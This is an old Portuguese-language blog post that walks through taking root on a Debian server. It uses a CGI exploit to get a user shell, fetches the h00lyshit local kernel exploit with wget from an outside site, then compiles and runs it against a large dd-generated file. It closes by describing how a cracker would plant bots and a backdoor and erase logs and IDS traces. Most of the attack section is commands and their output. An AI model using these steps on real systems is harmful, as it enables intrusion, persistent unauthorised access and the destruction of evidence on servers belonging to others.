quinta-feira, 17 de fevereiro de 2011

Pegando acesso ao Root No Debian

Bem, a forma mais simples de pegar acesso ao usuário root
seria usar um XPL(exploit local) se com um exploit você obteve
acesso a um “user” o segundo passo seria pegar o Root pelo menos
na cabeça do cracker…

Vamos pegar um exemplo:
1-usamos o exploit “Censtore. cgi exploit” para explorar um determinado server
http://www.milw0rm.com/exploits/1669

2-exploramos a falha num server vulnerável nos temos acesso a um “user” padrão exemplo
Código:



$ wellcome to debian
adminweb-$ uname -a <–analisando a versão do kernel
host.com.br bla bla 2.6.8 Linux kernel
adminweb-$ find / -perm -2 -ls <–comando para ver arquivos com permissão de escrita
/tmp/
/dev/bla bla ;………………..
adminweb-$ cd /tmp <– inves de procurar arquivos com permissões resolvi ir na pasta “/tmp” ou seja temporários
la temos permissão para usar executar arquivos dar wget depende muito do server em alguns tera que usar ftp ou curl…

3-Aqui a parte mais chata achar o XPL para versão do kernel bem como o kernel achado é antigo vamos usar o h00lyshit,a todo momento sai XPL para sistemas embora alguns sistemas demorem mais para sair como OpenBSD e NetBSD isso vai muito do Programador que faz XPLs geralmente eles fazem para os sistemas mais populares “Linux e freebsd” . Não é à toa que se você tem um servidor com linux você em que compilar o um novo kernel direto para ver as melhorias e arrumar as vulnerabilidades…

do sistema ,bem continuando..
Código:

Código:

adminweb-$ wget http://www.arblan.com/localroot/h00lyshit.c <–baixar o xpl do site desejado
download bla bla
adminweb-$ gcc h00lyshit.c -o h00lyshit <– compilamos o exploit
bla bla make.. bla bal
/ .. // as/.d./ ././ bla bla
adminweb-$

4-terminado isso temos que executar o XPL , porém, o h00lyshit como muitos XPL precisão de um arquivo grande para bugar e causar um crash no kernel exemplo “./h00lyshit arquivo_grande_do_disco” feito isso se tudo dar certo teremos acesso ao root,mas vamos gerar um arquivo grande no sistema com o comando “dd if=/dev/urandom of=grande count=2M” vai demorar de 2 a 5minutos se o comando falhar tente dd “if=/dev/zero of=/tmp/grande count=102400 bs=1024″ feito isso vamos executar nosso XPL

Código:
adminweb-$./h00lyshit grande
root-# whoami <– verificandose somos root
root
root-#

Pronto, funcionou o XPL estamos como root,um Cracker depois disso dar upload em seus Bots,deixa um OpenSSH ou um Backdoor e queima os Logs do sistema e possíveis ids(snort etc..)

Bem, acho que com este artigo vai ajudar muitos a entender como funciona XPLs.
Quer se sentir seguro? Use OpenBSD no seu servidor Piscar

0 comentários:

Postar um comentário